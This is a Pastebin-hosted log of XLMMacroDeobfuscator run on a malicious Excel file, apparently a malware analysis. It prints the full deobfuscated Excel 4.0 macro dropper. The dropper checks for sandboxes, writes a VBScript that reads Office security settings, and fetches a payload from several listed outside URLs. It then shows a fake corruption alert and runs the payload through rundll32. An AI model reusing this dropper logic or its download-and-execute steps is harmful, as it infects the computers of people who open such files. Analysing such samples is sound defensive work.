Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe "C:\Program Files\JetBrains\PyCharm 2020.1\plugins\python\helpers\pydev\pydevd.py" --multiproc --qt-support=auto --client 127.0.0.1 --port 64300 --file C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\order_93711.xls\order_93711.xls
- pydev debugger: process 14944 is connecting
- Connected to pydev debugger (build 201.6668.115)
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\order_93711.xls\order_93711.xls
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'egaz0Af2DyYfLadkmB'!$FR$27455
- [Starting Deobfuscation]
- CELL:FR27455 , FullEvaluation , FORMULA("=CHAR(R[51762]C[-81])",egaz0Af2DyYfLadkmB$GO$1321:$GO$1401)
- CELL:FR27456 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________)
- CELL:CQ46304 , FullEvaluation , "=CLOSE(FALSE)"
- CELL:CQ46305 , FullEvaluation , "=APP.MAXIMIZE()"
- CELL:CQ46306 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R33146C43),)"
- CELL:CQ46307 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R33146C43))"
- CELL:CQ46308 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)"
- CELL:CQ46309 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R33146C43),)"
- CELL:CQ46310 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)"
- CELL:CQ46311 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)"
- CELL:CQ46312 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R33146C43))"
- CELL:CQ46313 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R33146C43))"
- CELL:CQ46314 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))"
- CELL:CQ46315 , FullEvaluation , "=""C:\Users\Public\FsWhHWf.vbs"""
- CELL:CQ46316 , FullEvaluation , "=""C:\Users\Public\DC6PdmLB.txt"""
- CELL:CQ46317 , FullEvaluation , "=FOPEN(R33157C43,3)"
- CELL:CQ46318 , FullEvaluation , "=FWRITELN(R33159C43,""On Error Resume Next"")"
- CELL:CQ46319 , FullEvaluation , "=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")"
- CELL:CQ46320 , FullEvaluation , "=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")"
- CELL:CQ46321 , FullEvaluation , "=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")"
- CELL:CQ46322 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
- CELL:CQ46323 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.Close"")"
- CELL:CQ46324 , FullEvaluation , "=FCLOSE(R33159C43)"
- CELL:CQ46325 , FullEvaluation , "=EXEC(""explorer.exe ""&R33157C43&"""")"
- CELL:CQ46326 , FullEvaluation , "=WHILE(ISERROR(FILES(R33158C43)))"
- CELL:CQ46327 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:CQ46328 , FullEvaluation , "=NEXT()"
- CELL:CQ46329 , FullEvaluation , "=FILE.DELETE(R33157C43)"
- CELL:CQ46330 , FullEvaluation , "=FOPEN(R33158C43,2)"
- CELL:CQ46331 , FullEvaluation , "=FREAD(R33172C43,100)"
- CELL:CQ46332 , FullEvaluation , "=FCLOSE(R33172C43)"
- CELL:CQ46333 , FullEvaluation , "=FILE.DELETE(R33158C43)"
- CELL:CQ46334 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)"
- CELL:CQ46335 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))"
- CELL:CQ46336 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________78)
- CELL:BK48037 , FullEvaluation , FORMULA("=FORMULA(R[-1734]C[32],R[-14892]C[-20])",egaz0Af2DyYfLadkmB$BK$48038:$BK$48069)
- CELL:BK48038 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-14892]C[-20])
- CELL:BK48039 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-14892]C[-20])
- CELL:BK48040 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48041 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R33146C43))",R[-14892]C[-20])
- CELL:BK48042 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48043 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48044 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48045 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48046 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R33146C43))",R[-14892]C[-20])
- CELL:BK48047 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R33146C43))",R[-14892]C[-20])
- CELL:BK48048 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))",R[-14892]C[-20])
- CELL:BK48049 , FullEvaluation , FORMULA("=""C:\Users\Public\FsWhHWf.vbs""",R[-14892]C[-20])
- CELL:BK48050 , FullEvaluation , FORMULA("=""C:\Users\Public\DC6PdmLB.txt""",R[-14892]C[-20])
- CELL:BK48051 , FullEvaluation , FORMULA("=FOPEN(R33157C43,3)",R[-14892]C[-20])
- CELL:BK48052 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""On Error Resume Next"")",R[-14892]C[-20])
- CELL:BK48053 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")",R[-14892]C[-20])
- CELL:BK48054 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-14892]C[-20])
- CELL:BK48055 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")",R[-14892]C[-20])
- CELL:BK48056 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-14892]C[-20])
- CELL:BK48057 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.Close"")",R[-14892]C[-20])
- CELL:BK48058 , FullEvaluation , FORMULA("=FCLOSE(R33159C43)",R[-14892]C[-20])
- CELL:BK48059 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R33157C43&"""")",R[-14892]C[-20])
- CELL:BK48060 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R33158C43)))",R[-14892]C[-20])
- CELL:BK48061 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-14892]C[-20])
- CELL:BK48062 , FullEvaluation , FORMULA("=NEXT()",R[-14892]C[-20])
- CELL:BK48063 , FullEvaluation , FORMULA("=FILE.DELETE(R33157C43)",R[-14892]C[-20])
- CELL:BK48064 , FullEvaluation , FORMULA("=FOPEN(R33158C43,2)",R[-14892]C[-20])
- CELL:BK48065 , FullEvaluation , FORMULA("=FREAD(R33172C43,100)",R[-14892]C[-20])
- CELL:BK48066 , FullEvaluation , FORMULA("=FCLOSE(R33172C43)",R[-14892]C[-20])
- CELL:BK48067 , FullEvaluation , FORMULA("=FILE.DELETE(R33158C43)",R[-14892]C[-20])
- CELL:BK48068 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)",R[-14892]C[-20])
- CELL:BK48069 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))",R[-14892]C[-20])
- CELL:BK48070 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________79)
- CELL:AQ33147 , PartialEvaluation , APP.MAXIMIZE()
- CELL:AQ33148 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R33146C43),)
- CELL:AQ33149 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R33146C43))
- CELL:AQ33150 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R33146C43),)
- CELL:AQ33151 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R33146C43),)
- CELL:AQ33152 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)
- CELL:AQ33153 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)
- CELL:AQ33154 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R33146C43))
- CELL:AQ33155 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R33146C43))
- CELL:AQ33156 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R33146C43))
- CELL:AQ33156 , FullEvaluation , [TRUE]
- CELL:AQ33157 , FullEvaluation , "C:\Users\Public\FsWhHWf.vbs"
- CELL:AQ33158 , FullEvaluation , "C:\Users\Public\DC6PdmLB.txt"
- CELL:AQ33159 , PartialEvaluation , FOPEN("C:\Users\Public\FsWhHWf.vbs",3)
- CELL:AQ33160 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","On Error Resume Next")
- CELL:AQ33161 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set CAA = CreateObject(""WScript.Shell"")")
- CELL:AQ33162 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set cdtQbBq = CreateObject(""Scripting.FileSystemObject"")")
- CELL:AQ33163 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set zgVEMWV = cdtQbBq.CreateTextFile(""C:\Users\Public\DC6PdmLB.txt"", True)")
- CELL:AQ33164 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.WriteLine(CAA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
- CELL:AQ33165 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.Close")
- CELL:AQ33166 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)")
- CELL:AQ33167 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\FsWhHWf.vbs")
- CELL:AQ33168 , PartialEvaluation , WHILE(ISERROR(FILES(R33158C43)))
- CELL:AQ33171 , PartialEvaluation , FILE.DELETE("C:\Users\Public\FsWhHWf.vbs")
- CELL:AQ33172 , PartialEvaluation , FOPEN("C:\Users\Public\DC6PdmLB.txt",2)
- CELL:AQ33173 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)",100)
- CELL:AQ33174 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)")
- CELL:AQ33175 , PartialEvaluation , FILE.DELETE("C:\Users\Public\DC6PdmLB.txt")
- CELL:AQ33176 , FullBranching , IF(ISNUMBER(SEARCH("1",R33173C43)),GOTO(R33146C43),)
- CELL:AQ33176 , FullEvaluation , [TRUE] GOTO(R33146C43)
- CELL:AQ33146 , End , CLOSE(FALSE)
- CELL:AQ33176 , FullEvaluation , [FALSE]
- CELL:AQ33177 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))
- CELL:AQ33177 , FullEvaluation , [TRUE] GOTO(R13419C196)
- CELL:GN13419 , FullEvaluation , "=""C:\Users\Public\lxlGZ4A.html"""
- CELL:GN13420 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
- CELL:GN13421 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)"
- CELL:GN13422 , FullEvaluation , "=FILES(R38562C99)"
- CELL:GN13423 , FullEvaluation , "=IF(ISERROR(R38565C99),GOTO(R38572C99),)"
- CELL:GN13424 , FullEvaluation , "=FOPEN(R38562C99)"
- CELL:GN13425 , FullEvaluation , "=FSIZE(R38567C99)"
- CELL:GN13426 , FullEvaluation , "=FCLOSE(R38567C99)"
- CELL:GN13427 , FullEvaluation , "=IF(R38568C99<40000,,GOTO(R38589C99))"
- CELL:GN13428 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
- CELL:GN13429 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)"
- CELL:GN13430 , FullEvaluation , "=FILES(R38562C99)"
- CELL:GN13431 , FullEvaluation , "=IF(ISERROR(R38573C99),GOTO(R38580C99),)"
- CELL:GN13432 , FullEvaluation , "=FOPEN(R38562C99)"
- CELL:GN13433 , FullEvaluation , "=FSIZE(R38575C99)"
- CELL:GN13434 , FullEvaluation , "=FCLOSE(R38575C99)"
- CELL:GN13435 , FullEvaluation , "=IF(R38576C99<40000,,GOTO(R38589C99))"
- CELL:GN13436 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
- CELL:GN13437 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)"
- CELL:GN13438 , FullEvaluation , "=FILES(R38562C99)"
- CELL:GN13439 , FullEvaluation , "=IF(ISERROR(R38581C99),GOTO(R38588C99),)"
- CELL:GN13440 , FullEvaluation , "=FOPEN(R38562C99)"
- CELL:GN13441 , FullEvaluation , "=FSIZE(R38583C99)"
- CELL:GN13442 , FullEvaluation , "=FCLOSE(R38583C99)"
- CELL:GN13443 , FullEvaluation , "=IF(R38584C99<40000,,GOTO(R38589C99))"
- CELL:GN13444 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
- CELL:GN13445 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)"
- CELL:GN13446 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
- CELL:GN13447 , FullEvaluation , "=ALERT(R38589C99)"
- CELL:GN13448 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
- CELL:GN13449 , FullEvaluation , "=R38562C99&"",DllRegisterServer"""
- CELL:GN13450 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)"
- CELL:GN13451 , FullEvaluation , "=GOTO(R33146C43)"
- CELL:GN13452 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________80)
- CELL:DN28840 , FullEvaluation , FORMULA("=FORMULA(R[-15422]C[78],R[9721]C[-19])",egaz0Af2DyYfLadkmB$DN$28841:$DN$28873)
- CELL:DN28841 , FullEvaluation , FORMULA("=""C:\Users\Public\lxlGZ4A.html""",R[9721]C[-19])
- CELL:DN28842 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[9721]C[-19])
- CELL:DN28843 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)",R[9721]C[-19])
- CELL:DN28844 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
- CELL:DN28845 , FullEvaluation , FORMULA("=IF(ISERROR(R38565C99),GOTO(R38572C99),)",R[9721]C[-19])
- CELL:DN28846 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
- CELL:DN28847 , FullEvaluation , FORMULA("=FSIZE(R38567C99)",R[9721]C[-19])
- CELL:DN28848 , FullEvaluation , FORMULA("=FCLOSE(R38567C99)",R[9721]C[-19])
- CELL:DN28849 , FullEvaluation , FORMULA("=IF(R38568C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
- CELL:DN28850 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[9721]C[-19])
- CELL:DN28851 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)",R[9721]C[-19])
- CELL:DN28852 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
- CELL:DN28853 , FullEvaluation , FORMULA("=IF(ISERROR(R38573C99),GOTO(R38580C99),)",R[9721]C[-19])
- CELL:DN28854 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
- CELL:DN28855 , FullEvaluation , FORMULA("=FSIZE(R38575C99)",R[9721]C[-19])
- CELL:DN28856 , FullEvaluation , FORMULA("=FCLOSE(R38575C99)",R[9721]C[-19])
- CELL:DN28857 , FullEvaluation , FORMULA("=IF(R38576C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
- CELL:DN28858 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[9721]C[-19])
- CELL:DN28859 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)",R[9721]C[-19])
- CELL:DN28860 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
- CELL:DN28861 , FullEvaluation , FORMULA("=IF(ISERROR(R38581C99),GOTO(R38588C99),)",R[9721]C[-19])
- CELL:DN28862 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
- CELL:DN28863 , FullEvaluation , FORMULA("=FSIZE(R38583C99)",R[9721]C[-19])
- CELL:DN28864 , FullEvaluation , FORMULA("=FCLOSE(R38583C99)",R[9721]C[-19])
- CELL:DN28865 , FullEvaluation , FORMULA("=IF(R38584C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
- CELL:DN28866 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[9721]C[-19])
- CELL:DN28867 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)",R[9721]C[-19])
- CELL:DN28868 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9721]C[-19])
- CELL:DN28869 , FullEvaluation , FORMULA("=ALERT(R38589C99)",R[9721]C[-19])
- CELL:DN28870 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9721]C[-19])
- CELL:DN28871 , FullEvaluation , FORMULA("=R38562C99&"",DllRegisterServer""",R[9721]C[-19])
- CELL:DN28872 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)",R[9721]C[-19])
- CELL:DN28873 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[9721]C[-19])
- CELL:DN28874 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________81)
- CELL:CU38562 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html"
- CELL:CU38563 , FullEvaluation , "https://wireborg.com/wp-keys.php"
- CELL:CU38564 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38565 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38566 , FullBranching , IF(ISERROR(R38565C99),GOTO(R38572C99),)
- CELL:CU38566 , FullEvaluation , [TRUE] GOTO(R38572C99)
- CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
- CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
- CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
- CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
- CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
- CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
- CELL:AQ33146 , End , CLOSE(FALSE)
- CELL:CU38582 , FullEvaluation , [FALSE]
- CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
- CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
- CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
- CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
- CELL:AQ33146 , End , CLOSE(FALSE)
- CELL:CU38574 , FullEvaluation , [FALSE]
- CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
- CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
- CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
- CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
- CELL:CU38582 , FullEvaluation , [FALSE]
- CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
- CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:CU38566 , FullEvaluation , [FALSE]
- CELL:CU38567 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38568 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38569 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38570 , FullEvaluation , IF(R38568C99<40000,,GOTO(R38589C99))
- CELL:CU38571 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
- CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
- CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
- CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
- CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
- CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
- CELL:CU38582 , FullEvaluation , [FALSE]
- CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
- CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
- CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
- CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
